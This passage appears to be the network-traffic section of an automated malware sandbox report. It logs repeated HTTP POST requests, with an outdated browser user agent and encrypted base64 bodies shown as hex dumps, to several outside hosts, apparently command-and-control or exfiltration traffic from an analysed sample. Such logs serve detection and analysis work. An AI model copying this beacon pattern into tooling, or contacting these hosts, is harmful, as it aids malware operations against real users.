6f 6b 6b 79 56 6f 35 4d 79 51 49 54 49 55 41 61 4e 69 30 50 4b 71 77 43 73 69 42 47 7a 69 54 6d 48 76 68 35 64 7a 35 48 62 65 65 61 6a 4e 6f 49 66 34 36 56 37 46 6e 6a 44 42 50 57 58 50 30 6b 74 6b 36 4a 61 4d 62 78 32 53 50 61 70 52 35 39 69 59 47 48 59 33 51 75 33 79 31 6b 41 73 46 50 76 4b 6a 38 52 72 4d 76 68 2f 61 7a 70 37 56 47 5a 58 61 50 73 53 33 43 72 77 4d 6d 54 70 6f 33 46 48 37 4f 6d 30 5a 58 6e 53 55 5a 4e 4b 34 43 79 44 41 50 70 47 6f 41 32 4c 78 77 6f 43 37 6e 46 32 7a 51 64 53 41 57 64 74 62 53 67 76 67 54 42 47 42 70 4e 6f 64 37 76 32 49 31 45 34 55 4f 6f 7a 73 6c 41 64 79 47 6b 6f 65 68 78 71 59 6f 33 43 2b 67 57 79 74 77 67 75 49 56 79 44 66 66 77 6b 39 30 47 36 78 76 37 58 4f 30 58 46 50 36 74 6f 4f 37 42 35 34 2b 47 6d 73 34 3d Data Ascii: wC+ExnSl5pYyPhilz5Jl9McQaWZso5Ui6BG8isE4Tokz6xNBozijQbIsNIWAltbKSm/6H4NsPxS9UmJADbPJrcAE9E9RmGCnQyNU0/OUP8+X2JLnRYKwutUI1qrFZC+sHD92Z+7yvwVT/sRr/OxYfrD8My+jJgxSY1gq5dPAzMHcASKFsRHSkdiEwD4onGU0skVkwvDhyZvN2ltYrHvHSSJ2zvOLgJfXtQuVy/0ohPR+G/SBZ3kBD5szJpym10MJxm4Jl4sQ8u06bTmIhVf/2fSH8qUJRhMEfIJ3sWJokkyVo5MyQITIUAaNi0PKqwCsiBGziTmHvh5dz5HbeeajNoIf46V7FnjDBPWXP0ktk6JaMbx2SPapR59iYGHY3Qu3y1kAsFPvKj8RrMvh/azp7VGZXaPsS3CrwMmTpo3FH7Om0ZXnSUZNK4CyDAPpGoA2LxwoC7nF2zQdSAWdtbSgvgTBGBpNod7v2I1E4UOozslAdyGkoehxqYo3C+gWytwguIVyDffwk90G6xv7XO0XFP6toO7B54+Gms4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwkData Raw: 71 6d 6f 58 6f 37 55 75 33 5a 5a 53 39 47 35 36 48 48 44 7a 6c 61 34 49 74 64 5a 44 55 50 6c 51 75 62 37 7a 49 77 6c 46 4e 34 38 76 31 59 4e 6f 6a 69 78 56 52 59 51 44 35 5a 39 6b 4c 6b 37 45 4a 51 7a 42 71 32 6b 6c 50 74 63 42 6e 6a 5a 4a 47 37 63 71 43 67 4d 49 4b 79 49 68 6d 6f 71 37 44 76 6c 4d 32 5a 2f 34 6f 44 64 55 46 75 74 79 41 71 70 62 6d 2f 65 7a 34 66 76 41 68 62 69 62 4c 76 31 79 38 74 56 37 71 4a 51 73 42 50 46 45 58 6c 49 2b 39 65 6d 44 6b 36 43 34 4d 46 59 72 51 64 69 6e 4f 72 38 72 61 6b 33 68 4a 5a 51 67 43 35 4e 34 50 77 74 4d 38 77 75 2f 65 72 7a 36 43 71 4a 30 48 55 73 77 6a 63 51 63 57 53 2b 5a 6f 4d 6f 46 58 57 72 6f 5a 50 78 49 4e 74 62 4c 66 68 64 72 65 52 42 42 48 76 4b 79 47 59 7a 75 64 54 67 55 79 42 70 38 6e 73 61 36 61 70 33 65 35 41 65 79 53 41 59 42 6e 4a 64 69 66 55 56 59 58 4c 7a 79 4b 34 75 7a 2f 63 47 42 50 65 62 58 76 32 34 61 55 70 67 4e 67 46 63 51 42 54 73 4d 4b 7a 39 38 38 49 71 52 6d 56 52 76 33 78 6d 68 61 4d 48 78 4d 34 43 69 79 73 76 4e 59 74 55 53 6f 30 74 2b 53 49 49 57 2f 49 52 32 43 32 48 71 41 42 50 6f 2b 6c 6c 66 44 6a 69 4a 45 36 56 66 71 33 2b 56 54 2f 4e 79 4e 32 71 4b 67 43 69 50 42 2f 69 59 6c 64 4f 74 49 57 67 6b 41 59 36 32 38 61 55 4e 31 7a 31 55 45 74 6b 4e 6a 59 36 53 48 6f 37 74 6b 72 38 51 6c 61 6b 6d 4a 41 69 62 36 37 41 58 2b 41 73 47 55 2f 72 65 61 54 31 56 57 68 36 76 4c 48 32 6a 6d 76 39 62 67 48 69 35 50 70 34 4b 72 46 4b 7a 6e 4a 2b 53 6a 31 33 4b 39 57 6b 6a 6e 67 58 36 6c 73 4e 4c 73 74 65 44 54 57 34 79 61 2b 44 34 74 43 43 45 48 2f 46 6a 38 38 53 58 57 65 57 55 76 67 70 42 58 54 58 56 Data Ascii: qmoXo7Uu3ZZS9G56HHDzla4ItdZDUPlQub7zIwlFN48v1YNojixVRYQD5Z9kLk7EJQzBq2klPtcBnjZJG7cqCgMIKyIhmoq7DvlM2Z/4oDdUFutyAqpbm/ez4fvAhbibLv1y8tV7qJQsBPFEXlI+9emDk6C4MFYrQdinOr8rak3hJZQgC5N4PwtM8wu/erz6CqJ0HUswjcQcWS+ZoMoFXWroZPxINtbLfhdreRBBHvKyGYzudTgUyBp8nsa6ap3e5AeySAYBnJdifUVYXLzyK4uz/cGBPebXv24aUpgNgFcQBTsMKz988IqRmVRv3xmhaMHxM4CiysvNYtUSo0t+SIIW/IR2C2HqABPo+llfDjiJE6Vfq3+VT/NyN2qKgCiPB/iYldOtIWgkAY628aUN1z1UEtkNjY6SHo7tkr8QlakmJAib67AX+AsGU/reaT1VWh6vLH2jmv9bgHi5Pp4KrFKznJ+Sj13K9WkjngX6lsNLsteDTW4ya+D4tCCEH/Fj88SXWeWUvgpBXTXV
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 43 61 6e 57 39 6d 79 48 38 4a 62 37 42 72 4a 68 56 39 73 6d 39 6e 39 64 5a 4c 44 45 61 4f 4b 43 59 4e 39 30 41 55 56 58 2b 70 5a 63 56 76 69 6a 7a 6b 69 56 44 6e 6a 30 4e 49 5a 6b 4e 47 6d 2f 4b 43 59 58 65 55 43 6b 59 30 5a 63 48 62 56 2f 79 43 72 48 2f 39 47 53 79 35 45 67 47 64 41 4d 33 79 68 33 43 61 78 33 43 6b 6b 69 50 50 6f 47 33 54 72 77 50 39 44 4f 7a 4b 31 38 5a 2f 34 70 56 6c 6a 66 4b 4a 56 45 78 35 41 62 32 49 34 4a 62 4d 68 6b 37 4a 6b 62 36 56 77 4f 30 6e 77 72 45 6d 59 66 53 49 6b 51 58 74 52 6e 4a 59 57 2b 64 2f 46 44 64 2b 61 2f 44 79 6e 46 77 37 4d 67 2b 62 33 70 6e 4a 35 54 5a 70 53 32 66 42 45 4a 49 4b 62 6d 47 72 38 67 63 7a 78 39 54 32 73 51 77 78 54 61 70 38 58 55 61 45 59 43 2b 36 66 59 65 6c 70 49 49 4f 51 57 58 4c 4d 46 54 63 49 35 63 46 31 33 73 66 79 58 6a 50 33 5a 4c 45 78 54 30 6b 70 32 66 41 37 4a 73 44 65 73 62 65 4b 36 65 41 6c 58 4e 72 59 30 56 79 74 2f 68 4d 6a 49 6d 6c 56 2b 35 34 6e 73 4e 6e 61 36 59 65 69 4f 35 76 46 6a 41 5a 79 46 4e 61 4f 76 6d 37 31 49 72 6f 76 6a 4e 56 44 47 7a 6c 4b 46 64 36 79 30 32 52 6d 45 46 52 37 55 6d 2b 33 54 2f 48 66 57 52 72 30 51 49 33 75 6b 4b 46 2b 70 2b 4f 6c 46 72 68 49 31 68 43 38 64 38 43 4d 66 52 72 51 44 74 6d 77 73 6b 4c 36 7a 37 41 4a 79 2f 69 65 5a 69 73 45 4f 4e 46 68 51 6c 63 43 4f 72 6c 64 4c 76 53 44 4c 44 58 61 41 58 36 4d 2f 5a 51 61 61 52 6b 49 71 73 72 73 4a 5a 62 36 34 31 73 6a 52 55 58 55 6a 79 69 70 4d 65 70 73 2b 6e 2f 4c 49 79 71 2f 69 51 35 64 49 38 43 30 34 68 32 70 55 72 36 6b 74 33 6e 55 65 64 6c 5a 6c 75 57 61 71 75 73 32 64 53 79 71 52 6e 4c 55 37 35 5a 79 6d 53 4b 47 4e 63 46 71 43 63 49 61 77 55 64 58 79 4d 7a 4c 61 4b 4c 59 74 52 48 55 3d Data Ascii: CanW9myH8Jb7BrJhV9sm9n9dZLDEaOKCYN90AUVX+pZcVvijzkiVDnj0NIZkNGm/KCYXeUCkY0ZcHbV/yCrH/9GSy5EgGdAM3yh3Cax3CkkiPPoG3TrwP9DOzK18Z/4pVljfKJVEx5Ab2I4JbMhk7Jkb6VwO0nwrEmYfSIkQXtRnJYW+d/FDd+a/DynFw7Mg+b3pnJ5TZpS2fBEJIKbmGr8gczx9T2sQwxTap8XUaEYC+6fYelpIIOQWXLMFTcI5cF13sfyXjP3ZLExT0kp2fA7JsDesbeK6eAlXNrY0Vyt/hMjImlV+54nsNna6YeiO5vFjAZyFNaOvm71IrovjNVDGzlKFd6y02RmEFR7Um+3T/HfWRr0QI3ukKF+p+OlFrhI1hC8d8CMfRrQDtmwskL6z7AJy/ieZisEONFhQlcCOrldLvSDLDXaAX6M/ZQaaRkIqsrsJZb641sjRUXUjyipMeps+n/LIyq/iQ5dI8C04h2pUr6kt3nUedlZluWaqus2dSyqRnLU75ZymSKGNcFqCcIawUdXyMzLaKLYtRHU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 32 72 50 4c 43 66 30 6b 38 5a 59 66 45 4a 68 38 74 4b 49 66 6d 44 61 43 4a 47 67 72 43 4c 36 57 67 54 57 45 49 72 68 78 41 4a 53 4b 51 74 41 41 62 68 52 31 48 48 63 50 74 7a 59 74 2b 72 66 56 79 36 45 6c 4f 6c 7a 4a 39 66 31 59 48 65 63 61 42 54 55 50 76 33 6c 51 63 45 73 63 64 72 4b 53 32 37 6b 6b 7a 69 68 77 71 71 73 58 68 66 51 78 51 57 56 56 66 49 30 39 42 43 48 71 2f 31 6a 6f 4a 66 77 38 70 61 69 64 78 77 2f 30 71 54 61 56 48 4e 77 79 50 31 4d 69 33 42 42 76 36 54 33 56 36 51 78 6d 66 6e 39 55 2f 68 49 31 74 76 55 56 76 44 2b 44 49 39 78 35 4b 6f 49 54 53 59 73 38 4e 6d 79 32 71 33 43 64 76 69 4f 71 4d 62 70 67 2f 33 35 72 33 5a 4b 46 74 45 67 43 32 72 67 5a 37 6e 73 69 46 76 72 79 6d 6e 33 50 6b 50 6d 56 62 6d 42 68 70 36 4c 6d 36 6e 6f 32 68 66 47 46 32 78 6e 57 51 50 4b 71 39 33 43 64 51 42 51 6a 6f 52 79 39 47 47 38 6e 37 4b 4d 2b 30 72 58 49 33 35 7a 38 71 6a 51 34 41 79 5a 42 69 43 4a 6f 45 4a 41 77 75 47 39 35 71 57 45 47 78 57 55 76 5a 59 6b 4f 36 69 53 66 67 33 57 75 4e 76 43 52 4a 4f 5a 52 63 62 56 61 49 63 74 70 6d 48 33 44 35 46 71 30 32 49 61 62 66 56 6f 70 50 38 38 35 44 6c 39 56 58 76 55 69 54 70 50 6f 37 45 59 6d 45 4d 46 58 35 55 6e 59 52 4b 56 72 43 62 35 51 73 71 70 4f 38 5a 32 4d 47 57 64 58 53 50 62 63 50 4c 4c 38 77 6e 31 77 41 49 44 6c 2f 57 73 76 33 30 34 4d 47 38 6c 79 4c 6d 6d 49 56 69 59 69 4d 43 62 4f 6b 46 32 46 4a 62 4b 4b 48 79 4f 2b 34 76 59 41 52 75 6c 78 55 7a 77 52 73 37 36 38 61 6b 4c 6d 42 61 77 69 31 48 58 33 77 74 62 2b 43 59 57 35 37 73 4f 68 34 38 6e 46 48 2b 7a 4a 4c 69 74 4b 44 63 4d 79 41 44 51 6f 76 73 55 3d Data Ascii: 2rPLCf0k8ZYfEJh8tKIfmDaCJGgrCL6WgTWEIrhxAJSKQtAAbhR1HHcPtzYt+rfVy6ElOlzJ9f1YHecaBTUPv3lQcEscdrKS27kkzihwqqsXhfQxQWVVfI09BCHq/1joJfw8paidxw/0qTaVHNwyP1Mi3BBv6T3V6Qxmfn9U/hI1tvUVvD+DI9x5KoITSYs8Nmy2q3CdviOqMbpg/35r3ZKFtEgC2rgZ7nsiFvrymn3PkPmVbmBhp6Lm6no2hfGF2xnWQPKq93CdQBQjoRy9GG8n7KM+0rXI35z8qjQ4AyZBiCJoEJAwuG95qWEGxWUvZYkO6iSfg3WuNvCRJOZRcbVaIctpmH3D5Fq02IabfVopP885Dl9VXvUiTpPo7EYmEMFX5UnYRKVrCb5QsqpO8Z2MGWdXSPbcPLL8wn1wAIDl/Wsv304MG8lyLmmIViYiMCbOkF2FJbKKHyO+4vYARulxUzwRs768akLmBawi1HX3wtb+CYW57sOh48nFH+zJLitKDcMyADQovsU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 32 72 50 4c 43 66 30 6b 38 5a 59 66 45 4a 68 38 74 4b 49 66 6d 44 61 43 4a 47 67 72 43 4c 36 57 67 54 57 45 49 72 68 78 41 4a 53 4b 51 74 41 41 62 68 52 31 48 48 63 50 74 7a 59 74 2b 72 66 56 79 36 45 6c 4f 6c 7a 4a 39 66 31 59 48 65 63 61 42 54 55 50 76 33 6c 51 63 45 73 63 64 72 4b 53 32 37 6b 6b 7a 69 68 77 71 71 73 58 68 66 51 78 51 57 56 56 66 49 30 39 42 43 48 71 2f 31 6a 6f 4a 66 77 38 70 61 69 64 78 77 2f 30 71 54 61 56 48 4e 77 79 50 31 4d 69 33 42 42 76 36 54 33 56 36 51 78 6d 66 6e 39 55 2f 68 49 31 74 76 55 56 76 44 2b 44 49 39 78 35 4b 6f 49 54 53 59 73 38 4e 6d 79 32 71 33 43 64 76 69 4f 71 4d 62 70 67 2f 33 35 72 33 5a 4b 46 74 45 67 43 32 72 67 5a 37 6e 73 69 46 76 72 79 6d 6e 33 50 6b 50 6d 56 62 6d 42 68 70 36 4c 6d 36 6e 6f 32 68 66 47 46 32 78 6e 57 51 50 4b 71 39 33 43 64 51 42 51 6a 6f 52 79 39 47 47 38 6e 37 4b 4d 2b 30 72 58 49 33 35 7a 38 71 6a 51 34 41 79 5a 42 69 43 4a 6f 45 4a 41 77 75 47 39 35 71 57 45 47 78 57 55 76 5a 59 6b 4f 36 69 53 66 67 33 57 75 4e 76 43 52 4a 4f 5a 52 63 62 56 61 49 63 74 70 6d 48 33 44 35 46 71 30 32 49 61 62 66 56 6f 70 50 38 38 35 44 6c 39 56 58 76 55 69 54 70 50 6f 37 45 59 6d 45 4d 46 58 35 55 6e 59 52 4b 56 72 43 62 35 51 73 71 70 4f 38 5a 32 4d 47 57 64 58 53 50 62 63 50 4c 4c 38 77 6e 31 77 41 49 44 6c 2f 57 73 76 33 30 34 4d 47 38 6c 79 4c 6d 6d 49 56 69 59 69 4d 43 62 4f 6b 46 32 46 4a 62 4b 4b 48 79 4f 2b 34 76 59 41 52 75 6c 78 55 7a 77 52 73 37 36 38 61 6b 4c 6d 42 61 77 69 31 48 58 33 77 74 62 2b 43 59 57 35 37 73 4f 68 34 38 6e 46 48 2b 7a 4a 4c 69 74 4b 44 63 4d 79 41 44 51 6f 76 73 55 3d Data Ascii: 2rPLCf0k8ZYfEJh8tKIfmDaCJGgrCL6WgTWEIrhxAJSKQtAAbhR1HHcPtzYt+rfVy6ElOlzJ9f1YHecaBTUPv3lQcEscdrKS27kkzihwqqsXhfQxQWVVfI09BCHq/1joJfw8paidxw/0qTaVHNwyP1Mi3BBv6T3V6Qxmfn9U/hI1tvUVvD+DI9x5KoITSYs8Nmy2q3CdviOqMbpg/35r3ZKFtEgC2rgZ7nsiFvrymn3PkPmVbmBhp6Lm6no2hfGF2xnWQPKq93CdQBQjoRy9GG8n7KM+0rXI35z8qjQ4AyZBiCJoEJAwuG95qWEGxWUvZYkO6iSfg3WuNvCRJOZRcbVaIctpmH3D5Fq02IabfVopP885Dl9VXvUiTpPo7EYmEMFX5UnYRKVrCb5QsqpO8Z2MGWdXSPbcPLL8wn1wAIDl/Wsv304MG8lyLmmIViYiMCbOkF2FJbKKHyO+4vYARulxUzwRs768akLmBawi1HX3wtb+CYW57sOh48nFH+zJLitKDcMyADQovsU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=89114abc8f12de8cbbbabddf86489f60|102.129.143.43|1685537397|1685537397|0|1|0; snkz=102.129.143.43Data Raw: 65 38 45 42 39 6f 4f 41 38 4a 62 36 44 67 72 6a 69 71 79 6b 52 71 77 52 37 44 73 70 69 53 64 44 5a 2f 59 54 68 6b 4f 41 6a 63 6c 4a 31 79 6f 77 46 53 6c 78 52 4c 57 76 38 79 31 37 48 6e 7a 34 4d 64 70 56 74 66 39 62 4c 54 44 59 31 61 2f 79 33 66 4d 2f 68 66 72 75 5a 34 63 50 35 52 58 48 6f 51 62 55 34 33 38 71 78 55 37 58 38 4d 57 39 51 6b 35 4b 6f 6d 58 37 41 34 79 54 49 41 62 58 79 31 50 37 35 4a 6a 71 48 67 74 55 76 41 73 7a 7a 5a 62 54 77 6d 43 55 4f 48 45 4b 68 56 55 33 63 47 31 72 61 68 55 62 69 6c 78 6d 2b 4e 66 61 34 2f 42 67 2f 49 51 6c 2b 50 66 57 67 78 70 73 67 6b 6a 58 77 63 36 64 59 74 68 6d 4e 6d 4c 67 6f 50 51 4a 4c 6d 77 53 70 31 62 64 53 61 43 78 59 68 6f 43 4c 74 66 49 50 72 65 76 56 61 33 61 42 59 6b 6f 66 62 6a 5a 69 49 49 38 54 36 5a 54 75 36 57 30 56 52 4c 68 78 62 2f 2f 6a 68 67 65 38 78 4d 73 4b 50 4c 41 33 2f 62 34 38 36 6a 30 43 46 71 43 61 48 31 72 76 79 42 4c 4f 6d 6f 47 4c 66 6d 4e 41 30 43 75 69 54 47 38 5a 53 5a 61 68 37 46 43 30 45 4f 6c 6a 55 38 52 4d 63 39 68 4e 4a 54 63 79 52 55 4f 4c 58 71 31 61 64 6a 68 6f 75 32 53 33 73 72 50 6e 4d 35 63 35 49 6c 44 79 35 4e 4f 43 4d 6c 30 53 43 78 52 79 63 58 36 67 74 6e 58 35 4f 73 7a 66 55 4f 7a 79 45 54 4e 38 54 79 59 2b 62 46 42 31 41 5a 59 2f 37 61 35 74 2b 59 52 32 74 36 43 62 48 44 68 32 4c 6d 37 6f 78 34 38 72 7a 5a 47 78 78 4b 68 55 6b 31 67 67 68 6a 65 75 5a 33 51 66 4a 53 35 6d 66 37 72 62 4d 4c 69 2f 73 59 41 49 69 36 6c 43 51 78 7a 30 65 76 6c 72 4b 46 4d 52 34 31 79 50 55 4e 48 38 69 6b 38 34 38 56 47 49 7a 54 6a 70 68 35 2b 37 53 6b 39 70 59 4b 64 53 59 56 4e 5a 6d 2b 56 39 77 67 2b 4b 44 6a 2f 75 46 7a 65 2b 4c 46 58 74 72 45 69 6c 78 4c 35 32 55 73 3d Data Ascii: e8EB9oOA8Jb6DgrjiqykRqwR7DspiSdDZ/YThkOAjclJ1yowFSlxRLWv8y17Hnz4MdpVtf9bLTDY1a/y3fM/hfruZ4cP5RXHoQbU438qxU7X8MW9Qk5KomX7A4yTIAbXy1P75JjqHgtUvAszzZbTwmCUOHEKhVU3cG1rahUbilxm+Nfa4/Bg/IQl+PfWgxpsgkjXwc6dYthmNmLgoPQJLmwSp1bdSaCxYhoCLtfIPrevVa3aBYkofbjZiII8T6ZTu6W0VRLhxb//jhge8xMsKPLA3/b486j0CFqCaH1rvyBLOmoGLfmNA0CuiTG8ZSZah7FC0EOljU8RMc9hNJTcyRUOLXq1adjhou2S3srPnM5c5IlDy5NOCMl0SCxRycX6gtnX5OszfUOzyETN8TyY+bFB1AZY/7a5t+YR2t6CbHDh2Lm7ox48rzZGxxKhUk1gghjeuZ3QfJS5mf7rbMLi/sYAIi6lCQxz0evlrKFMR41yPUNH8ik848VGIzTjph5+7Sk9pYKdSYVNZm+V9wg+KDj/uFze+LFXtrEilxL52Us=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 5a 30 56 6b 77 41 63 54 39 35 5a 6b 5a 59 4d 6f 4e 72 51 2b 4e 4e 41 2b 79 6f 58 39 4a 31 69 4d 4b 38 39 6c 58 4f 65 34 63 42 7a 70 63 64 6b 2b 37 2b 5a 33 70 77 56 4f 6c 6e 36 6a 42 41 33 6b 52 61 50 74 69 42 79 72 77 6b 65 6b 52 64 73 69 70 7a 50 6a 56 32 2b 32 2f 43 66 6e 55 7a 70 69 36 43 41 71 35 67 50 6b 54 46 48 76 37 6c 77 51 6f 55 34 66 51 78 71 62 71 5a 6c 59 46 67 48 47 4d 6f 6b 73 35 61 4e 48 6d 4a 50 39 72 58 61 77 5a 59 6a 6a 51 65 37 71 42 52 70 35 42 4a 63 61 67 51 6c 35 66 46 52 66 34 77 75 34 76 48 78 47 49 58 7a 4a 78 4d 32 2b 63 64 64 2f 57 7a 31 57 62 51 58 58 44 67 69 68 72 75 73 35 4d 6c 76 5a 4d 58 65 37 73 50 79 61 62 51 6d 4d 6e 75 33 70 4a 6a 43 4c 48 2b 36 6d 59 52 5a 35 71 48 58 43 62 56 55 7a 34 44 56 68 4c 46 38 6d 31 77 72 58 77 6c 6d 37 34 49 4c 61 51 70 6f 39 51 55 74 4f 66 49 50 59 6e 67 4f 55 6c 49 59 30 70 67 38 75 53 33 4e 63 5a 47 6f 34 6a 30 47 50 32 6b 62 59 6e 64 54 64 2b 65 7a 54 71 68 38 62 7a 6b 79 42 59 2b 69 73 6a 69 75 33 6f 45 47 2f 65 50 7a 37 78 53 34 7a 4a 47 4f 72 36 69 7a 44 6a 45 61 56 62 56 73 2f 30 37 42 55 6c 49 34 4e 62 39 33 73 5a 76 46 6a 48 2f 47 5a 74 50 74 2f 59 31 4a 51 32 6c 43 6e 58 71 36 36 4e 72 70 53 39 6a 6e 4c 6c 46 4e 55 47 54 4b 30 2f 41 54 66 4c 43 44 46 41 51 55 53 39 55 63 33 77 6b 39 68 33 34 54 43 75 6c 6b 6a 36 45 68 45 75 34 6c 6f 43 6f 54 77 35 76 61 45 50 43 6e 45 74 73 56 7a 2f 56 75 62 68 67 4f 4f 38 58 57 31 6c 76 2b 75 6e 64 7a 5a 51 56 67 69 38 55 49 72 45 37 50 56 7a 63 50 34 72 63 65 49 35 49 49 57 38 34 66 30 41 6d 37 77 30 64 36 6f 4b 4a 46 4b 39 53 71 4d 4e 6e 77 36 56 4f 7a 6e 68 33 55 43 65 54 56 6a 69 79 64 62 77 53 68 64 75 71 61 30 44 44 33 74 33 47 6d 4f 2f 34 42 69 2f 54 42 79 Data Ascii: Z0VkwAcT95ZkZYMoNrQ+NNA+yoX9J1iMK89lXOe4cBzpcdk+7+Z3pwVOln6jBA3kRaPtiByrwkekRdsipzPjV2+2/CfnUzpi6CAq5gPkTFHv7lwQoU4fQxqbqZlYFgHGMoks5aNHmJP9rXawZYjjQe7qBRp5BJcagQl5fFRf4wu4vHxGIXzJxM2+cdd/Wz1WbQXXDgihrus5MlvZMXe7sPyabQmMnu3pJjCLH+6mYRZ5qHXCbVUz4DVhLF8m1wrXwlm74ILaQpo9QUtOfIPYngOUlIY0pg8uS3NcZGo4j0GP2kbYndTd+ezTqh8bzkyBY+isjiu3oEG/ePz7xS4zJGOr6izDjEaVbVs/07BUlI4Nb93sZvFjH/GZtPt/Y1JQ2lCnXq66NrpS9jnLlFNUGTK0/ATfLCDFAQUS9Uc3wk9h34TCulkj6EhEu4loCoTw5vaEPCnEtsVz/VubhgOO8XW1lv+undzZQVgi8UIrE7PVzcP4rceI5IIW84f0Am7w0d6oKJFK9SqMNnw6VOznh3UCeTVjiydbwShduqa0DD3t3GmO/4Bi/TBy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwk; _mcnc=1Data Raw: 71 6d 6f 58 6f 37 55 75 33 5a 5a 53 39 47 35 36 48 48 44 7a 6c 61 34 49 74 64 5a 44 55 50 6c 51 75 62 37 7a 49 77 6c 46 4e 34 38 76 31 59 4e 6f 6a 69 78 56 52 59 51 44 35 5a 39 6b 4c 6b 37 45 4a 51 7a 42 71 32 6b 6c 50 74 63 42 6e 6a 5a 4a 47 37 63 71 43 67 4d 49 4b 79 49 68 6d 6f 71 37 44 76 6c 4d 32 5a 2f 34 6f 44 64 55 46 75 74 79 41 71 70 62 6d 2f 65 7a 34 66 76 41 68 62 69 62 4c 76 31 79 38 74 56 37 71 4a 51 73 42 50 46 45 58 6c 49 2b 39 65 6d 44 6b 36 43 34 4d 46 59 72 51 64 69 6e 4f 72 38 72 61 6b 33 68 4a 5a 51 67 43 35 4e 34 50 77 74 4d 38 77 75 2f 65 72 7a 36 43 71 4a 30 48 55 73 77 6a 63 51 63 57 53 2b 5a 6f 4d 6f 46 58 57 72 6f 5a 50 78 49 4e 74 62 4c 66 68 64 72 65 52 42 42 48 76 4b 79 47 59 7a 75 64 54 67 55 79 42 70 38 6e 73 61 36 61 70 33 65 35 41 65 79 53 41 59 42 6e 4a 64 69 66 55 56 59 58 4c 7a 79 4b 34 75 7a 2f 63 47 42 50 65 62 58 76 32 34 61 55 70 67 4e 67 46 63 51 42 54 73 4d 4b 7a 39 38 38 49 71 52 6d 56 52 76 33 78 6d 68 61 4d 48 78 4d 34 43 69 79 73 76 4e 59 74 55 53 6f 30 74 2b 53 49 49 57 2f 49 52 32 43 32 48 71 41 42 50 6f 2b 6c 6c 66 44 6a 69 4a 45 36 56 66 71 33 2b 56 54 2f 4e 79 4e 32 71 4b 67 43 69 50 42 2f 69 59 6c 64 4f 74 49 57 67 6b 41 59 36 32 38 61 55 4e 31 7a 31 55 45 74 6b 4e 6a 59 36 53 48 6f 37 74 6b 72 38 51 6c 61 6b 6d 4a 41 69 62 36 37 41 58 2b 41 73 47 55 2f 72 65 61 54 31 56 57 68 36 76 4c 48 32 6a 6d 76 39 62 67 48 69 35 50 70 34 4b 72 46 4b 7a 6e 4a 2b 53 6a 31 33 4b 39 57 6b 6a 6e 67 58 36 6c 73 4e 4c 73 74 65 44 54 57 34 79 61 2b 44 34 74 43 43 45 48 2f 46 6a 38 38 53 58 57 65 57 55 76 67 70 42 58 54 58 56 Data Ascii: qmoXo7Uu3ZZS9G56HHDzla4ItdZDUPlQub7zIwlFN48v1YNojixVRYQD5Z9kLk7EJQzBq2klPtcBnjZJG7cqCgMIKyIhmoq7DvlM2Z/4oDdUFutyAqpbm/ez4fvAhbibLv1y8tV7qJQsBPFEXlI+9emDk6C4MFYrQdinOr8rak3hJZQgC5N4PwtM8wu/erz6CqJ0HUswjcQcWS+ZoMoFXWroZPxINtbLfhdreRBBHvKyGYzudTgUyBp8nsa6ap3e5AeySAYBnJdifUVYXLzyK4uz/cGBPebXv24aUpgNgFcQBTsMKz988IqRmVRv3xmhaMHxM4CiysvNYtUSo0t+SIIW/IR2C2HqABPo+llfDjiJE6Vfq3+VT/NyN2qKgCiPB/iYldOtIWgkAY628aUN1z1UEtkNjY6SHo7tkr8QlakmJAib67AX+AsGU/reaT1VWh6vLH2jmv9bgHi5Pp4KrFKznJ+Sj13K9WkjngX6lsNLsteDTW4ya+D4tCCEH/Fj88SXWeWUvgpBXTXV
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 64 4b 36 4f 5a 49 77 58 39 4a 61 6a 36 35 66 54 39 2b 33 68 64 4a 38 47 69 6d 46 6b 53 37 61 68 67 46 6d 6c 65 58 71 35 78 35 6b 73 58 67 6b 32 5a 31 39 7a 47 74 31 43 48 4d 59 6d 68 48 43 35 6c 6e 41 65 43 57 79 63 2f 69 2f 41 70 6b 47 39 62 37 4b 7a 76 4d 33 6a 47 35 6a 73 77 39 47 67 48 4d 2f 30 37 57 47 6d 53 48 62 2b 75 4b 70 48 66 34 4e 56 46 4c 64 51 65 32 50 4c 65 2f 65 35 4c 43 51 4b 56 68 6c 74 4a 63 2b 74 6e 39 4f 42 37 74 78 69 4e 6d 55 42 59 41 4b 45 45 2f 59 31 32 59 44 36 59 6c 2b 4e 43 54 6e 45 32 2f 2f 34 56 57 4b 6c 6d 72 